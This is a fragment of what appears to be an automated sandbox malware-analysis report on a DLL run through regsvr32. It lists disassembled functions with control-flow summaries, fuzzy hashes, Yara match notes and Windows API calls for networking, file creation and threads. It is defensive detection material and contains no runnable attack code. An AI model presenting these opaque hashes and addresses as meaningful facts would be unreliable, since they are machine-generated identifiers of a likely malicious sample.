                                                                                • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                                • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180006B24 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 562 180006b24-180006b65 563 180006b67-180006b6c 562->563 564 180006b72-180006b77 563->564 565 180006da8-180006e6a call 180029374 563->565 566 180006b79-180006b7e 564->566 567 180006b8b-180006c09 call 180008900 564->567 573 180006e76-180006e7a 565->573 574 180006e6c-180006e71 565->574 569 180006b84-180006b89 566->569 570 180006e7f-180006e84 566->570 575 180006c0e-180006c13 567->575 569->563 570->563 576 180006e8a-180006e8d 570->576 573->570 577 180006d9a-180006da3 574->577 578 180006c19-180006c1e 575->578 579 180006e8f-180006f04 call 180024104 575->579 576->579 580 180006f06-180006f0d 576->580 577->563 578->576 582 180006c24-180006c29 578->582 581 180006f11-180006f2b 579->581 580->581 582->577 584 180006c2f-180006cef call 180029374 582->584 584->576 588 180006cf5-180006d94 call 18002071c call 180024104 584->588 588->576 588->577
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "Gd$C2$HG
                                                                                • API String ID: 0-142661339
                                                                                • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                                • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180006F2C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $!$e##
                                                                                • API String ID: 0-2900154246
                                                                                • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                                • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                                                • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                                • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 000000018002446C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InternetOpen
                                                                                • String ID: &J@$Va$Z*
                                                                                • API String ID: 2038078732-1197100596
                                                                                • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                                • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                                                • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                                • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 000000018001BF0C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 629 18001bf0c-18001bfb0 call 18001feb0 632 18001bfb2-18001c02b call 180026974 629->632 633 18001c031-18001c063 CreateFileW 629->633 632->633
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `/
                                                                                • API String ID: 823142352-1163903809
                                                                                • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                                • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                                                • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                                • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180016500 Relevance: 1.6, APIs: 1, Instructions: 95networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConnectInternet
                                                                                • String ID:
                                                                                • API String ID: 3050416762-0
                                                                                • Opcode ID: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                                                • Instruction ID: 6bd4319daaf70d9cfa93cd172db4ac0144cd1887b423fd46bbb7d9a578168b32
                                                                                • Opcode Fuzzy Hash: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                                                • Instruction Fuzzy Hash: 8C41F7705087848FC7B8DF58D48579ABBE0FB98315F108A5EE48DD7361DB749884CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180017BF8 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InformationVolume
                                                                                • String ID:
                                                                                • API String ID: 2039140958-0
                                                                                • Opcode ID: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                                                • Instruction ID: e87697cfd510fd4059a611545946932b1d04e28e1a34b551021fd5cd6805f499
                                                                                • Opcode Fuzzy Hash: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                                                • Instruction Fuzzy Hash: AB31E770618B888FD7B8CF68D4857AAB7E1FB89315F508A1EE48DC7251CB749845CB43
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00000001800149CC Relevance: 1.6, APIs: 1, Instructions: 91networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpOpenRequest
                                                                                • String ID:
                                                                                • API String ID: 1984915467-0
                                                                                • Opcode ID: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                                                • Instruction ID: c8d36c456ba033a28ec6fbd746a54a3663befea28eedef4c15a9fc959fe4c155
                                                                                • Opcode Fuzzy Hash: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                                                • Instruction Fuzzy Hash: D331607050CB848BE7B4DF08D4C9B9AB7E0FB98315F108A4DE48DD7296CB789484CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180011EF8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                                                • Instruction ID: 87f7a9be59381a5b3d954798ed335bb6745bcd8ebd0cdd375d804fe942fcfa66
                                                                                • Opcode Fuzzy Hash: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                                                • Instruction Fuzzy Hash: 7A312B7160CB848FDBA8DF18E48579AB7E1FB98314F10465EE88CC7396DB309984CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%